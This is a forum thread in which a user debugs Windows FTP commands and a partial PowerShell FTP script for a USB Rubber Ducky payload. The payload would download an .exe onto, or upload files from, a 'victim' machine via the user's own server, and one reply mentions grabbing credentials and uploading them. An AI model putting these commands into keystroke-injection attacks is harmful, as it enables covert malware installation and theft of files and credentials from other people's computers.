How to upload files to an FTP Server via CMD?

[contrix_]

I wanted to make a Rubber Ducky Script that uploads or downloads from my FTP Server.

I came up with these commands:

For downloading:

ftp -i ftpserver.com

*typing in username and pass*

get file.exe (yes the files is in the root folder)

The login worked fine. On my first FTP Server, I got the Error message " Error 500 Unable to service PORT commands" . After some research, I found out, that the ftp.exe does not support passive mode (no, the pasv command didn´t work). For whatever reason, i tried it on my other servers. So I´m typing everything in again, and then I get the message "200 Port command successful" and a few seconds after that "425 Could not open data connection to port 65086: Connection timed out" (no, the server wasn´t down).

For uploading I used these commands:

ftp -i ftpserver.com

*typing in username and pass*

lcd C:\Users\myname\Desktop

put myfile.exe

With this commands i get the same error as on Server 1 and 2.

Can anyone help me?

 

contrix_ ;)

[digip]

I'd say, try it as a bat script first, get it all worked out, then move everything over to ducky script afterwards. if timeouts happen, possibly add in between every so often a site generic command for informational purposes, that keeps the connection alive. something that won't execute anything, but just is for general keep alive message between commands. Testing in bat file and watching with wireshark will help debug everything before moving it over to automated ducky stuff. Also, check in the ducky section(where this should be posted), there might be working ftp scripts you can use as skeletons to base your work on. https://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/

Don't post the same question over there as well as that will make duplicates for the same topic. A mod may move it for you but instead, go search that section for example scripts. Hopefully that helps. If you get it working, then make a new thread in the https://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/ section to help others with the full code you came up with.

 

Cheers.

Edited April 19, 2017 by digip

[contrix_]

Thank for this answer. I thought that the question belongs here because I didn´t find that many questions in the Rubber Ducky topic. I´ll try the suggestions you made ;)

[contrix_]

What do you mean with "generic command"? Sorry, i am new to this and couldn´t find anything about it on Google.

[digip]

I don't have any ftp sites at the moment to look at, I use scp with a graphical client for most everything these days, but when logged into an ftp system, there is the "site" command. you can usually type like "help site" or just site by itself. Just calling help, ls or dir would also suffice at specified intervals. Anything that keeps the connection alive if it's set to close after a certain amount of time to auto kick/log you out of the system. The site command itself was not important to have an argument so much as just send something to keep the connection alive.

[contrix_]

Thank you for your answer. I tried everything you said, but it didn´t work. I just tried it on Linux with -p for passive mode and everything worked fine, so the passive mode is the problem.

Btw: I just remembered that I asked the question here because it had nothing to do with the Rubber Ducky. I only had the problem with the commands and had already a script from the Payloads site + Batch File, that used those commands.

But thanks for your answer anyways ;) Do you have any idea how I can solve that passive problem? Why and how can others download files from an FTP Server via CMD then?

[digip]

Windows built in ftp client, only tells the server to enter passive mode with either pasv or quote pasv, but as far as I know, the client itself doesn't support passive mode. You'd need a third party ftp client, but if anyone else know how then please post. Possibly look into powershell and if it can do ftp at all, and enable passive mode as well. Most I've seen is a separate scripts - https://gallery.technet.microsoft.com/scriptcenter/PowerShell-FTP-Client-db6fe0cb and http://stackoverflow.com/questions/19059394/powershell-connect-to-ftp-server-and-get-files type stuff.

 

How are you interfacing with the server though? Are you invoking ftp with -s and pointing to your premade script? like putting all your config info in ftp.txt and then calling it like "ftp -s:ftp.txt" to do the work for you. Give that a try, see if it works. If so, you'd then have to figure out thre ducky side to create and execute it in similar fashion.

 

edit: form ducky forums, seems it's possible to grab creds and upload them, so shouldn't be an issue,just need to find the right syntax setup

 

 

Edited April 20, 2017 by digip

[contrix_]

I tried the exact same as the guy in the video did. You can see the commands I used in my question. The problem with a 3rd party FTP client is, that the "victim" doesn´t have it installed. I put WinSCP(which is a 3rd party FTP client) on my server, but surprisingly I couldn´t download it. I´ll try that PowerShell thingy. Thanks for your effort tho.

[contrix_]

So I just tried a script from the StackOverflow Site, but when I execute it, nothing happens.

  #FTP Server Information - SET VARIABLES
    $ftp = "myftpserver.com" 
    $user = 'User' 
    $pass = 'pass'
    $folder = '????'
    $target = "C:\Users\me\Desktop\files"

    #SET CREDENTIALS
    $credentials = new-object System.Net.NetworkCredential($user, $pass)

    function Get-FtpDir ($url,$credentials) {
        $request = [Net.WebRequest]::Create($url)
        $request.Method = [System.Net.WebRequestMethods+FTP]::ListDirectory
        if ($credentials) { $request.Credentials = $credentials }
        $response = $request.GetResponse()
        $reader = New-Object IO.StreamReader $response.GetResponseStream() 
        while(-not $reader.EndOfStream) {
            $reader.ReadLine()
        }
        #$reader.ReadToEnd()
        $reader.Close()
        $response.Close()
    }

    #SET FOLDER PATH
    $folderPath= $ftp + "/" + $folder + "/"

    $files = Get-FTPDir -url $folderPath -credentials $credentials

    $files 

    $webclient = New-Object System.Net.WebClient 
    $webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass) 
    $counter = 0
    foreach ($file in ($files | where {$_ -like "*.exe"})){
        $source=$folderPath + $file  

 I don´t know what to insert in $folder, the guy who made it just wrote "FTP_Folder". Is that the target folder on the FTP Server? It it would be the root folder, I would just have to type in "/", right? The folder "files" is empty when I inserted "/".

Edited April 20, 2017 by contrix_
Grammar

[digip]

What kind of file was the script? Looks not like a bat file but maybe C# or VBS code. Sorry,can't help here.

 

On your original setup though, when it asked for pasv, you could try "quote pasv" and see if that invokes it, but again, don't know if windows built in client can do pasv. Worth a try.

[contrix_]

I tried the pasv, it didn´t work. The script is a PowerShell code. But do you know what I have to insert in "????"? It was originally "FTP_Folder". Maybe it´s the target folder on the FTP Server? It it would be the root folder, I would just have to type in "/", right? The folder "files" is empty when I inserted "/".